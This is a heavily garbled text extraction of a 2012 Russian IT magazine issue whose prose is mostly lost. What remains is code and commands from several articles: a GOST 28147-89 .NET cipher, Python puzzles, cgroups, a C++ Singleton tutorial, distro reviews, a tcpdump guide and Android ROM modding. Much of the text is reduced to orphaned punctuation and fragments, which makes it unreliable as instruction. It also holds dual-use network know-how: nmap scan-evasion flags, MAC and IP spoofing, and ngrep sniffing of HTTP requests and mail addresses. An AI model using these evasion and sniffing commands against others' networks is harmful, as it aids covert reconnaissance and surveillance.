byte[] rgbKey,
byte[] rgbIV
){}
public override ICryptoTransform CreateEncryptor()
{}
public override void GenerateIV(){}
public override void GenerateKey(){ }
}
.
private static byte[] GetRandomBytes(int bytesCount)
private static void Gamm(byte[] input,
byte[] gamma, byte[] output)
, .NET
FRAMEWORK ,
,

(CFB)
089
OID
XOR . ,
, .
GetRandomBytes
GenerateIV GenerateKey: IVValue
KeyValue,
.

. , ,
64 256 .

- ,
.
(, ),
(, ).
, .

OID (object identificator),

. OID ,
(,
) ,
. OID

(arcs), :
"{joint-iso-itu-t(2) ds(5) attributeType(4)
distinguishedName(49)}"
"2.5.4.49"
public GostCfb()
{
LegalBlockSizesValue = new[]
{ new KeySizes(64, 64, 0) };
LegalKeySizesValue = new[]
{ new KeySizes(256, 256, 0) };
BlockSizeValue = 64;
KeySizeValue = 256;
}
CreateEncryptor
CreateDecryptor, GostCfb
, ICryptoTransform.
private sealed class GostCfbTransformEncr:ICryptoTransform
{}
private sealed class GostCfbTransformDecr:ICryptoTransform
{}

(
). ASN.1 ,
,
-
.
www.oid-info.com.
ASN.1 -
,
,
. ASN.1
ITU-T, ,
.
.
GOSTCFBTRANSFORMENCR
CreateEncryptor . GostCfb.
, , , .
, ,
, ECB CFB,
,
2 ( , ).
() ,
.
OID ,
,

//
private byte[] m_Key;
// ,
//
private byte[] m_State;
//
private byte[] tmpState;
090

:
public int TransformBlock(...)
01 /156/ 2012
.NET-
{
...
byte[] plainBlock = new byte[8];
int result = 0;
while(inputCount > 0)
{
//
Array.Copy(inputBuffer, inputOffset, plainBlock, 0,8);
Gost28147.Gost28147Ecb(m_State, tmpState, m_Key);
Gamm(plainBlock, tmpState, m_State);
Array.Copy(m_State, 0, outputBuffer, outputOffset, 8)
inputCount -= 8;
inputOffset += 8;
outputOffset += 8;
result += 8;
}
...
return result;
}
,
. , ,
XOR. , ,
.
TransformFinalBlock
TransformBlock, .
,
,
.
GostCfbTransformDecr
GostCfbTransformEncr,
CFB, , ,
( ,
).
KEYEDHASHALGORITHM
KeyedHashAlgorithm .
HashAlgorithm, :
protected abstract void HashCore(
byte[] array, int ibStart, int cbSize)
protected abstract byte[] HashFinal()
CLR
,
28147-89. ( 16 ,
16 ). , ,
HashAlgorithm, , ,
KeyedHashAlgorithm:
.

28147-89 GostImito.
KeyValue
HashValueSize 32, 32 .
HashCore , (
InternalTransform).
DWORD, 16-
, :
...
uint tempInH = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8));
uint tempInL = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8 + 4));
uint tempOutH = 0;
uint tempOutL = 0;
Gost28147.EncryptBlock16(ref tempInH, ref tempInL,
ref tempOutH, ref tempOutL,
Gost28147.P, KeyValue);
uImito ^= tempOutH;
...
(8 ) DWORD, 16-
(EncryptBlock16),
.
DWORD , -,
(XOR DWORD
, XOR ), , .
HashFinal ,
.
.NET
Framework GAC.
GAC
GAC Browser
01 /156/ 2012
.NET,
GAC, Global Assembly Cache (-
091

). GAC ,
. , , strong name, ,
, .
,
sn.exe, .NET
Framework. :
sn.exe -k keypair.snk

keypair.snk. Signing
Sign the assembly (.
3). . , .
GAC
gacutil, .NET Framework.
.NET,
, GAC .
:
gacutil /i < >
Public Key Token, Culture , GAC Explorer,

Windows, GAC Browser (. 4).

.NET .
machine.config, XML .

cryptographySettings,
mscorlib. Name Mapping.
:
cryptoClass,
nameEntry. , ,
.
OID -
oidMap
oidEntry.
<cryptographySettings>
<cryptoNameMapping>
<cryptoClasses>
<cryptoClass GOSTCFB="Gost.GostCfb, GostAlgs,
Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
<cryptoClass GOSTIMITO="Gost.GostImito, GostAlgs,
Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
</cryptoClasses>
<nameEntry name="GostImitoAlg" class="GOSTIMITO" />
<nameEntry name="GostCfbAlg" class="GOSTCFB" />
<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />
</cryptoNameMapping>
<oidMap>
<oidEntry OID="1.2.643.2.2.21" name="GostCfbAlg" />
<oidEntry OID="1.2.643.2.2.22" name="GostImitoAlg" />
</oidMap>
</cryptographySettings>
GOSTCFB GOSTIMITO,
GostCfbAlg GostCfb, GostImitoAlg
GostImito.
<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />
, GostCfb, - GostImito
(. 5). SymmetricAlgorithm.
Create GostCfbAlg .
CryptoConfig
092
01 /156/ 2012
.NET-
28147-89
28147-89
,
. ,
: XOR,
2^32 11 .
(8 ) 4
. ( mod 2^32),

(SBox), .
.
31- , 32 ,
8 .
, 28147-89,
.

.
7.
KeyedHashAlgorithm.Create, .
CryptoConfig.CreateFromName,
Activator.CreateInstance
catch.

null.
oidMap OID
, CryptoConfig
OID . , MSDN , name oidEntry
( , , GostCfb),
,
nameEntry, OID .
, - , ,
machine.config. OID private machineOidHT, -private
machineNameHT CryptoConfig (. 6).
, 28147-89
CLR
- ,
CryptoStream,
Stream.

.
, ,
CryptoStream ,
CryptoStream .
.
-
.
CryptoStream
,
. ,
,
, Position - CryptoStream.
01 /156/ 2012
MONO PROJECT
Mono, , GAC,
. , ,
:
$ gacutil -i < >
:
$ gacutil -l
machine.config ( Ubuntu) /etc/mono/<

Mono>/.
,
.NET Framework, .
- . z
093
(ivinside.blogspot.com)
.
,
?
, 50
, (
50 ; , ).
,
.
. ,
094
.
- , :
,
, .
(100 - ) / .
, y(x) = x + (100 - x) / x.
. ,
, . ;).
, , = 10,
19. ! . , ...
, .
,
01 /156/ 2012
, , , !
,
. , : n(k) + (n(k) - 1) + ... +
(n(k) - k + 1), k , n
. , ,
:
(2 * n(k) - k + 1) * k / 2. n(k) = 100 / k + k / 2 - 1/2,
. :) , ,
200, , 14,
.
tokens = [0 for i in xrange(len(tokensdict))]

#
for key in tokens:
tokens[tokens[key]] = key
t = timeit.Timer(setup='from __main__ import func1',
stmt='func1()')
print t.timeit(number = 1)
t = timeit.Timer(setup='from __main__ import func2',
stmt='func2()')
print t.timeit(number = 1)
:
tokens = []
for token in tokeniter:
if token not in tokens:
tokens.append(token)
tokensiter ,
, .

, tokensiter.
.
if token not in
tokens:, -
O(n*m), 1 < m < n. , , . ,
, .
:
import random
import timeit
#
# 1 99999
f = []
for i in xrange(1, 20000):
f.append(random.randrange(1, 100000))
#
def func1():
tokens = []
for token in f:
if token not in tokens:
tokens.append(token)
#
def func2():
tokensdict = {}
i = 0
for token in f:
if not tokensdict.has_key(token):
# :
tokensdict[token] = i
i += 1
#
01 /156/ 2012
$ python2 test.py
6.80089592934
0.0135538578033
600 .
O(n),
.
.
O(log n).
.
?
Linux.
cpulimit, SIGSTOP SIGCONT:

# cpulimit --pid=<pid> --limit=<value>
value , , pid.
CPU, ,
4-
, 100%, 400%.
cgroups,
.
.
cgroups:
$ yaourt -S libcgroup
095

,
:
group default {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 10; }}
1
, - .
: ) , )

, .
2
( ).
, Python.
group daemons/tomcat {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 40; }}
3
, URL (
URL), N
. N,
, 10.
.
threading, eventlet, gevent, Twisted .
4
Oracle
. , ,
.
group daemons/postgres {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 50; }}
mount {
cpu = /mnt/cgroups/cpu;
cpuacct = /mnt/cgroups/cpu;
}
,
: daemons/tomcat 40 %, daemons/
postgres 50 %, default 10 %. . /etc/cgrules.conf:
<user>
*:tomcat
*:postgres
*
<controllers>
cpu
cpu
cpu
filtered , .
:
;
;

;
(
, ).
:
IP- MAC- ( ,
/, ):
<destination>
daemons/tomcat/
daemons/postgres/
default/
tomcat daemons/
tomcat, postgres daemons/postgres, default.
# ifconfig eth0 192.168.1.123

# ifconfig eth0 hw ether 00:01:02:03:04:05
, , + ,
;
, .
# nmap -sS -Pn -n -iL active-hosts
. ,
/ filtered.
?
096

nmap, :
--max-rate 50
50 /;
-f ;
-g 88 ;
--data-length 50 50
.
/. z
01 /156/ 2012
>> coding
deeonis (deeonis@gmail.com)
-
,
-

.

, ,
,

.
,
, Singleton.
,
, .
098
, Singleton. , , - .
, -
Windows, user mode - , . ,
, ini-
. , ,
,
. Save,
. , ,
?
,
.
.
.

, ,
, gSettings,
. CSettings. , ,
, .
.

class CSettings
{
public:
void getSettings() {...};
//...
01 /156/ 2012
}
//
CSettings gSettings;
-,
.
CSettings gSettings. , , ,
,
, , gSeetings
. -,

, .

gSettings, ,
,
.
, ,
. -, CSettings, ,
, , gSettings
. ,
, , .
- :
static
.

class CSettings
{
public:
static void getSettings() {...};
//...
}
//
CSingleton;

class CSettings
{
private:
CSettings();
static CSettings* m_instance;
public:
static CSettings* getInstance()
{
if (m_instance == 0)
m_instance = new CSettings();
return m_instance;
}
void getSettings() {...};
//...
}
//
CSettings* CSettings::m_instance = 0;
// CSettings
CSettings::getInstance()->getSettings();
CSettings::getSettings();

, , .
,
, , . ,
:
.
- . , ,
ini-. ,
, , -
CSettings , CSettings
.
, , CSettings
. , new.
-
getInstance().
CSettings
m_instance, ,
,
. , 100 %- ,
,
, ,
.
, ,
,
. ,

. ,
, .
, C++ .
, . , private,
.
, .
.
( ) .
.
, . .
CSingleton,
,
getInstance(), . ,

,
( ,
), , -
01 /156/ 2012
099

, getInstance
. .
CSingleton
template <class T>
class CSingleton
{
public:
virtual ~CSingleton() {};
static T* getInstance()
{
m_instance = new T();
return m_instance;
}
protected:
CSingleton() {};
static T* m_instance;
};
// CSettings
class CSettings : public CSingleton<CSettings>
{
private:
CSettings();
protected:
friend class CSingleton<CSettings>;
public:
static void getSettings() {...};
//...
}
CSingleton ,
getInstance . , , ,
CSettings - ,
new.
, C++ friend,
. -
.
,
. ,
, CSingleton
, .
CSingleton, .
Wikipedia
,

CSettings. , 1
getInstance. , m_instance
, , CSettings , .
2, getInstance,
, , m_instance.
1, ,
CSettings , m_instance.
.
, , ,
.
, . C++
, API- . Windows CSingleton,
, :
CSingleton
template <class T>
class CSingleton{
public:
virtual ~CSingleton() {};
static T* getInstance()
{
EnterCriticalSection(...);
m_instance = new T();
LeaveCriticalSection(...);
return m_instance;
}
protected:
CSingleton() {};
static T* m_instance;
};
,
CSettings, .
, .
100

. , , ,
, .
, -. z
01 /156/ 2012
>> coding
UNIXOID
grinder (grinder@tux.in.ua)

LINUX

,

:
,
,
,

.

.

.
102
INFO
Sabayon

.
Sabayon emerge
,
equo,
.
.config Calculate
Linux
1560 ,
866,
Sabayon
2625 1250
.

Calculate
Linux
.
Linux Mint
.
PCLinuxOS

x64.
, Mageia

Mandriva.
GENTOO
Gentoo,
, ,
:
.
,

( USE), ,
.
Sabayon 7
: sabayon.org
: GPL
: i686, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 3.0, Glibc 2.13, Udev 171, X.org 1.10.4, GNOME 3.2, KDE 4.7,
LibreOffice.Org 3.4.3
Sabayon Gentoo,
Distrowatch.com .
Fabio Erculiani. ,
, Gentoo ,
, .
(
) Gentoo.
, 5.4
ServerBase .
01 /156/ 2012
Sabayon Entropy Store
,
SpinBase:
: KDE, GNOME;
: XFce, LXDE, Enlightenment SpinBase/
OpenVZ ( OpenVZ).
,
CoreCDX, SpinBase
(Fluxbox). 4.1
Molecule.
DAILY . ,
( isohybrid).
Gentoo, Portage,
. , Sabayon
Entropy. , , ,
Gentoo ,
. equo:
, Sabayon ,
, .
,
. 6 /etc/make.conf . ,
, ,
. make.conf
.
Live-
. (
XBMC). Anaconda,

. ,
. , , ,
. , , (
man).
Sabayon , ,
. ,
wide-, 4:3 ,
GNOME , root
.
. , .
( ATI NVidia)
. :
,
. . , . .config Sabayon
, Calculate Linux ( Calculate 1560 ,
866, Sabayon 2625 1250 ).
, . /etc/skel
( 14 ),
.
,
,
Gentoo CL.
# equo install mc
equo , , ,
apt-get: , , ,
smart- ( ),
.
Magneto Store equo ( Magneto). Store
( ) ,
.
(USE-, , . .) ,

Portage. : emerge ,
equo ( Package Setting),
- . ,
, equo . , , , . Sabayon
.
Calculate Linux ( ),
01 /156/ 2012
DISTROWATCH.COM
( 06.11.2011)
1. Mint
2. Ubuntu
3. Fedora
4. Debian
5. openSUSE
6. Arch
7. PCLinuxOS
8. CentOS
9. Puppy
10. Mandriva
2155
2108
1686
1318
1290
1222
1032
916
866
708
11. Mageia
12. Lubuntu
13. Scientific
14. Zorin
15. Slackware
16. Chakra
17. Sabayon
18. FreeBSD
19. Bodhi
20. Gentoo
627
612
575
563
563
563
557
490
478
453
103
UNIXOID
Calculate Linux 11.9
: calculate-linux.ru
: GPL
: i686, x86_64
: Intel Pentium II, 128 (XFce) 512 (KDE) M
RAM, 46
Kernel 3.0.4, Glibc 2.23.4, Udev 164, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.1, LibreOffice.Org 3.3.4
, .
: (CDS Directory
Server) KDE- (CLD) , (LDAP, mail, ftp,
jabber, , . .). ,
. ,
, : GNOME (CLDG), XFce (CLDX), CMC (Calculate
Media Center, XBMC), CLS (Calculate Linux
Scratch) CSS (Calculate Scratch Server). , ,
. ,
Gentoo, IRC-
Gentoo Foundation. (Anthony G. Basile)
hardened/selinux-.
100 % Gentoo ( Gentoo)

, CL .

Calculate 2 ( ). , cl-install,
, , ,
.
,
.
,
,
Gparted c/fdisk. LVM
soft RAID /boot-.
IRC , . , .
RAM, , . ,
initramfs udev, ,
, Sabayon.
11.0 , ,
Sabayon,
, ,
( ). CL
equo,
emerge, , , vs .
,
( ).
REDHAT/FEDORA SLACKWARE
, Linux , RedHat/Fedora Slackware,
. ,
.
CentOS, , ,
, RedHat
.
Fedora
, ,
.
Fusion Linux (fusionlinux.org). Fuduntu
(fuduntu.org) Ubuntu, Fedora.
KDE Xange Linux (openxange.com) , .
RedHat (, CentOS)
Yellow Dog Linux (yellowdoglinux.com). ,
PowerPC PS3.
. VectorLinux (www.
vectorlinux.com), ;
Zenwalk (zenwalk.org), ; DeepStyle (deepstyle.org.ua) AgiliaLinux (
MOPSLinux, agilialinux.ru).
(/var/lib/layman/calculate/profiles/patches), , ,
.
: Grub .
- ,
. /var/calculate/linux cl-install.
Chromium OS , , .
# eselect profile list
( *) .
# eselect profile set 1
Gentoo. CL - , , USE- .
ebuild-
104
Calculate Linux
01 /156/ 2012
, 50 % ).
2.32. , KDE, XFce, Fluxbox . : DVD- (
, ), OEM- CD- ( ).
Windows .
( ), .
Zorin OS 5.1
: zorin-os.com
: GPL
: i386, x86_64
Kernel 2.6.38, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.2,
LibreOffice.Org 3.3.3.1
Linux Mint
UBUNTU
, Ubuntu, , . ,
.
Linux Mint 11 "Katya"
: linuxmint.com
: GPL
: i386, x86_64
Kernel 2.6.38-8, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.1,
LibreOffice.Org 3.3.2
Ubuntu, , , Linux. (
) Distrowatch.com,
. Clement Lefebvre.
,
.
( ).
Windows-.
,
Ubuntu, 100 %.

, ,
Ubuntu, .
. , . , ,
mintMenu, mintInstall
mintUpdate. mintInstall
: . , , ,
. Ubuntu Software Center,
, .
, -
(community.linuxmint.com/software). mintUpdate
: ,
, . Ubuntu, LTS-
.
LMDE, Debian
Gnome XFce Rolling
release. LMDE (201109).
GNOME (
01 /156/ 2012
, Ubuntu
, Windows.
( GnoMenu, , ,
) Win7. , .
Nautilus-Elementary
Gloobus Preview, Apple Quicklook.

, Software Center .
Zorin OS Look Changer
,
, Win7, WinXP Ubuntu.
Internet Browser Manager
- ( Chrome).
ZOS Wine
PlayOnLinux Winetricks, Windows. Ubuntu. , Core (
), Lite ( LXDE) Educational
. (Ultimate, Business,
Multimedia, Gaming) .
Ubuntu, LTS- (3.1).
Zorin OS Win7
105
UNIXOID
Localization Manager (addlocale):
, , .
, . ,
PCLinuxOS Magazine,
(Karoshi, CAElinux, TinyMe ZEN-mini).
Mageia 1
: mageia.org/ru/
: GPL
: i586, x86_64
Kernel 3.0.4, Glibc 2.12.1, Udev 173, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.4, LibreOffice.Org 3.4.3
PCLinuxOS addlocale
MANDRIVA
, Mandriva
.
PCLinuxOS KDE 2011 Desktop

: pclinuxos.com
: GPL
: i586
Kernel 2.6.38.8, Glibc 2.11.2, Udev 168, X.org 1.10.4, GNOME 2.32.1,
KDE 4.6.4
2003 Mandrake
( Mandriva). Radically Simple .

, Live-.
. 2007 PCLinuxOS Mandriva.
KDE-, (XFce, LXDE, OpenBox GNOME) . Full Monty Desktop DVD
, . Rolling
release, RPM-based.
PCLOS , 64- CPU.
CD-,
.
, LibreOffice
. URPM PCLinuxOS
,
APT Synaptic. ,
DrakX, : , .
, -
ZOS
WINE
PLAYONLINUX WINETRICKS
106
, , 2010.
Mandriva, . ,
Mandriva, ,

.
.
.
, , , , . ,
Mageia :
161 , 20 .
. -, 32- CD KDE GNOME. (Europa 2). DVD-
ISO, , 32-,
64- . .
Mageia Mandriva. Mageia Live ,
. ,
: .
, ,
. Mageia Control
Center, Mandriva CC. Rpmdrake.
Mandriva Mageia 1. ,
, mageia.org/en/1/migrate. z
Mageia Mandriva,
01 /156/ 2012
(execbit.ru)

TCPDUMP
UNIX-

.
,

tcpdump. ,
Linux
BSD- , ,
.
tcpdump , ,
.
,
.

tcpdump , .
25 ,
UNIX.
UNIX-
Windows libpcap, tcpdump.
, tcpdump,
,
.
01 /156/ 2012
107
UNIXOID
tcpdump ,
TCP, UDP, ICMP, SMB/CIFS, NFS, AFS, AppleTalk. tcpdump

?
. :
Flags [.], seq 3666073194:3666074622, ack 3281095139,
win 2000, options [nop, nop, TS val 70228462 ecr 1681724],
length 1428
TCP-, tcpdump
( ):
DNS- tcpdump
DNS-

, tcpdump
. root ( , tcpdump
),
:
# tcpdump -i wlan0 -c 10 -n
'-n' IP- DNS-.

, :
# tcpdump -i wlan0 -c 10 -n host 192.168.0.1 \
and port 53
, tcpdump, ,
DNS- tcpdump.
, DNS- ( 53) 192.168.0.101
192.168.0.1 . ?
16:22:41.340105 ( frac).
IP, , , :
: . , ,

. tcpdump
,
.
tcpdump DNS- 49244+ A? ya.ru. (23), ,
A?, ya.ru,
TCP/IP- 23
. .
,
, (8/2/3) (A
213.180.204.3, A 77.88.21.3, A 87.250.250.3...).
108
flags .
S (SYN), F (FIN), P (PUSH) R (RST),
.
data-seqno ,
first:last, first last

nbytes.
ack (ISN + 1).
window .
options ,
<mss 1024> ( ).
lenght .

,
.
, -X:
# tcpdump -i wlan0 -c 10 -n -X \
host 192.168.0.1 and port 80

, HTTP, .
, , .
,
'-v'. IP
IP-:
(tos 0x0, ttl 64, id 8339, offset 0, flags [DF],
proto UDP (17), length 51)
-, .
(TOS), (TTL),
,
, , (TCP,
UDP, ICMP) .

tcpdump, .
, host port,
, ,
, ?
src:
# tcpdump -i wlan0 -c 10 -n src 192.168.0.1
dst,
. , and:
# tcpdump -i wlan0 port not 22 and port not 53
01 /156/ 2012
GREP
TCPDUMP
tcpdump
,
.
ngrep,
, .
, , GET
POST HTTP-,
:
tcpdump:
# ngrep -l -q -d eth0 "^GET |^POST " \

tcp and port 80
:
# ngrep -i 'game*|p0rn|adult' -W byline \
-d eth0 > slackers.txt
SMTP- :
# ngrep -i 'rcpt to|mail from' tcp port smtp
, SSH DNS-. or () except ().

, tcpdump :
i [] , any.
n IP- DNS-.
nn IP- .
X .
XX Ethernet-.
v, -vv, -vvv
(, , ).
c [n] n .
s [n] , ( ,
).
S TCP-
(TCP sequence numbers).
e Ethernet-.
q ( ).
E IPsec- .
SYN ( TCP-), :
# tcpdump 'tcp[13]==2'
# tcpdump -i wlan0 -c 10 -n portrange 21-23
:
# tcpdump -i wlan0 -c 10 -n > 32 and <= 128
? . TCP-
,
. SYN .
, . ,
:
:
# tcpdump 'tcp[tcpflags] & tcp-syn != 0'
# tcpdump -i wlan0 c 10 -n src net 192.168.0.0/16 \
and dst net 10.0.0.0/8 or 172.16.0.0/16
tcpdump

.
: proto[expr:size], proto , expr
, size ,
( 1
). , -
tcpdump :
,
TCP/IP.
tcpdump,
.
1 , tcpdump
TCP- , nmap. , nmap 192.168.0.100
1. TCP-
01 /156/ 2012
109
UNIXOID
2. SYN-
TCP- ,
SYN- (S ). 8888,
RST-. ,
.
587 . , nmap SYN-
22- (SSH) SYN-ACK:
, TCP-
, , ,
, . tcpdump
2.
TCP-, -
:
192.168.0.100.43337 > 192.168.0.111.22: Flags [S], seq

2610024277, ...
192.168.0.111.22 > 192.168.0.100.43337: Flags [S.], seq
3496707239, ack 2610024278, ...
192.168.0.100.43337 > 192.168.0.111.22: Flags [.], ack 1,
...
192.168.0.100.48585 > 192.168.0.111.22: Flags [S],

seq 1679394613, ...
192.168.0.111.22 > 192.168.0.100.48585: Flags [S.],
seq 625029896, ack 1679394614, ...
192.168.0.100.48585 > 192.168.0.111.22: Flags [R],
seq 1679394614, ...
, nmap ,
RST-, .
: , ACK-,
. , , , .
:
, . , ,
, nmap, , .
:
SYN- (nmap -sS). -
, ,
SYN-ACK, ,
, . 3 UDP-. : nmap UDP-,
. ,
ICMP unreachable:
RTMP-
-, tv.adobe.com,
RTMP .
, tcpdump .
RTMP-, :
# tcpdump -eflAi eth0 -s 0 -w - | strings | \
grep -ao "rtmp://.\+.flv"
rtmpdump (lkcl.net/rtmp) flv- :
$ ./rtmpdump -r 'URL' -o .flv
16:41:48.798310 IP 192.168.0.100.61020 >

192.168.0.111.18869: UDP, length 0
16:41:48.798346 IP 192.168.0.111 > 192.168.0.100: ICMP
192.168.0.100 udp port 18869 unreachable, length 36
.
null-, ,
(nmap -sN).
, . , Linux RST-:
192.168.0.100.39132 > 192.168.0.111.256: Flags [],
win 3072, length 0
192.168.0.111.256 > 192.168.0.100.39132: Flags [R.], ...
Xmas- FIN, URG PUSH (- ,

):
192.168.0.100.35331 > 192.168.0.111.5544: Flags [FPU],
seq 3998959601, win 4096, urg 0, length 0
192.168.0.111.5544 > 192.168.0.100.35331: Flags [R.],
seq 0, ack 3998959602
, . ACK-
110
01 /156/ 2012
3. UDP-
(-sA) tcpdump
ACK
RST. , ,
, nmap ,
. tcpdump
, , ICMP-
:
16:43:06.008305 IP 192.168.0.100
type-#68, length 1032
16:43:06.008383 IP 192.168.0.100
16:43:06.008714 IP 192.168.0.100
16:43:06.008831 IP 192.168.0.100
> 192.168.0.111: ICMP

> 192.168.0.111: ICMP
> 192.168.0.111: ICMP
> 192.168.0.111: ICMP
, ,
.
ICMP- . (, SYN)
.

tcpdump ,
,
.
, tcpdump
,
Wireshark:
$ ssh root@example.ru tcpdump -w - 'port !22' \
| wireshark -k -i -
google.com tcpdump

, ,
,

. ,
, Cisco Discovery Protocol,
Cisco :
# tcpdump -nn -v -i eth0 -s 1500 -c 1 \
'ether[20:2] == 0x2000'
,
DHCP (DISCOVER, REQUEST, INFORM),
:
'-w -' Wireshark, .

Snort:
# tcpdump -i eth0 -vvv -s 1500 '((port 67 or \

port 68) and (udp[8:1] = 0x1))'
$ ssh root@example.ru "tcpdump -nn -i eth1 -w -" \

| snort -c /etc/snort/snort.conf -r -
# tcpdump -i eth0 "tcp port pop3 and ip[40] = 85 \

and ip[41] = 83" -s 1500 -n
grep,
, :
# tcpdump -nnvv -r dump.cap tcp | \
grep -v "tcp sum ok" | wc l
01 /156/ 2012
, POP3-:
tcpdump , , .
,
. z
111
UNIXOID
(execbit.ru)
ID
O
R
D
N
A
Android

,
,

.
,

.

Linux,

Android ,
.
112
WWW
goo.gl/tlHRo

framework-res.apk.
goo.gl/fTvz8

Android.
goo.gl/Ya1fX

.
goo.gl/P6JR

IBM PC.
goo.gl/sGXwa

Android Honeycomb.

Android-:
1. , Google CyanogenMod.
2. .
3. ,
.
,
Android ,
.
, Android
, ,
.
( ) Android-,
.
,
,
. ,
, ,
.
.
01 /156/ 2012
xda-developers

, ,

ClockworkMod, ( , ,
,
][).
, , ,
. ,
, .
?
, ,
xda-developers.com.
, iOS, Windows
Mobile, Windows Phone Android. ,
Forums . Android
Development , [ROM]. -
Pure Android 2.3 Rom
CyanogenMod, , ,
(, , ). , , -
ROM .
.
unzip:
$ mkdir ~/rom; cd ~/rom
$ unzip ..///.zip
: META-INF, boot.img system.

,
,
, ,
NAND- ,
-, .
boot.img , Linux initrd. ,
,
/proc. ,
,
BFS NFS,
xda-developers
ClockworkMod.
, system , .

Android Linux. ,
, . :
app : , ,
. .
bin /bin /usr/bin Linux. , . ,
dalvikvm.
etc . /etc Linux, , , .
Android /data/data.
fonts .
Droid ( Roboto Android 4.0).
framework Java-,
Android-. framework-res.apk, ,
.
lib Linux-,
. /lib /usr/lib Linux,
, libc (,
Android Bionic Glibc), libz (gzip), libssl .
media : , ,
.
tts , .
usr , , bin. ,
/usr/share.
vendor , .
firmware , Wi-Fi.
xbin , ,
bin. ,
, (top,
). CyanogenMod : bash, ssh, powertop,
busybox . .
build.prop , ,
.
, , , , Android, ,
NAND- .
Android ,
,
/system/app
. ,
, . ,
, Android ( ADWLauncher
CyanogenMod) . K,
LauncherPro (www.launcherpro.com):
01 /156/ 2012
113
UNIXOID
$ rm system/app/Launcher.apk
$ wget goo.gl/U9c54 -o system/app/LauncherPro.apk
. , ,
. , Android
.
.
(, prey),
. ,
Dialer One Phone.apk Go SMS
sms.apk.
Linux-, ssh mc? .
Android ARM NDK
Google,
. , mc .
xda-developers Midnight
Commander. apk- (goo.gl/Pax1H)
unzip:
$ cd /tmp; unzip ~/NativnuxInstaller_1.1.apk
assets/kits/mc-4.7.5.4arm.tar.jet. tar.gz,
apk- ( ,
apk, Install).
mc:
$ cd ~/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet
mc.
zip-
ClockworkMod Recovery. ,
(
~/rom) unzip.
SETPROP
build.prop
setprop:
# setprop debug.sf.nobootanimation 1
layout XML (
AXML, apktool XML).
,
, , .
xda-developers,
Android.
framework-res mod
_.

framework-res.apk, . , framework-res
diff:
$ diff -R ~/framework-res \
~/rom/system/framework/framework-res
,
framework-res,

4PDA: goo.gl/tlHRo.
framework-res.apk
apktool.
aapt Android SDK, apktool
apk-. :
$ cd ~/bin; wget goo.gl/tC7k8

,
Android .
Android, , .
Android framework/
framework-res.apk.
apktool:
$
$
$
$
cd ~; wget goo.gl/hxz5l
tar -xjf apktool1.4.1.tar.bz2
cd ~/rom/system/framework
java -jar ~/apktool.jar d framework-res.apk

framework-res, . res/drawable-* res/layout-*.
png-
. , drawableland-mdpi
,
(
). ,
.
114
$
$
$
$
cd ~/rom/system/framework
java -jar ~/apktool.jar b framework-res
cp framwork-res/dist/framework-res.apk .
rm -rf framework-res
. png-, system/
media/bootanimation.zip. :
$ cd /tmp
$ mkdir bootanimation; cd bootanimation

,

ANDROID
01 /156/ 2012
build.prop Motorola Defy
FPS 24):
$ mplayer -nosound -vo png:z=9 video.avi
. xda-developers
,
.
.

, , . Android
system/build.prop,
.
,
Android, .
.
ClockworkMod Recovery: Android
$ unzip ~/rom/system/media/bootanimation.zip
desc.txt, :
FPS
p
...
1. :
ro.HOME_APP_ADJ=1

.

.
2. JPG-:
:
ro.media.enc.jpeg.quality=100
480 800 30
p 1 0 part0
p 0 0 part1
, 480 x 800, (FPS) 30 /.

,
part0. ( 1
p). (part1)
, . part0 , ,
part0 ,
. ,
,
0001.png, 0002.png . .
,
.
png- mencoder ( desc.txt
01 /156/ 2012
, .
3. :
debug.sf.nobootanimation=1
4. GPU:
debug.sf.hw=1
.
5. ( USB):
persist.adb.notify=0
115
UNIXOID
wifi.supplicant_scan_interval=180
pm.sleep_mode=1
ro.ril.disable.power.collapse=0
3. 3G-:
ro.ril.hsxpa=2
ro.ril.gprsclass=10
ro.ril.hep=1
ro.ril.enable.dtm=1
ro.ril.hsdpa.category=10
ro.ril.enable.a53=1
ro.ril.enable.3g.prefix=1
ro.ril.htcmaskw1.bitmask=4294967295
ro.ril.htcmaskw1=14449
ro.ril.hsupa.category=5
4. :
framework-res.apk
net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960
system/
build.prop .
, , , . testsign.
zip:
$ cd ~/rom; zip -r my-rom.zip *
, Recovery
:
$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip

6.
:
ro.lge.proximity.delay=25
mot.proximity.delay=25
7. :
ro.mot.buttonlight.timeout=0
,
:
1. :
debug.performance.tuning=1
video.accelerate.hw=1
windowsmgr.max_events_per_sec=150
2. :
116
my-rom-signed.zip
.
Recovery,
( ).

Wipe data/factory reset,
( Recovery <Enter>), Yes
<Enter>.
Install zip from sdcard,
Choose zip from sdcard, my-rom-sign.zip SD-
Yes. Reboot
system now.
Android ,
.
, , ,
,
(/etc/init.d), .
. z
01 /156/ 2012
- Ubuntu 11.10
-
UBUNTU 11.10
Oneiric Ocelot ( ) 15- Linux- Canonical.
Unity. CD-,
DVD- ( 1,5 ),
(Inkscape, GIMP, Pitivi LibreOffice). ISO-
CD/DVD, USB Flash.

:
Linux kernel 3.0.1;

Unity 4.12.0
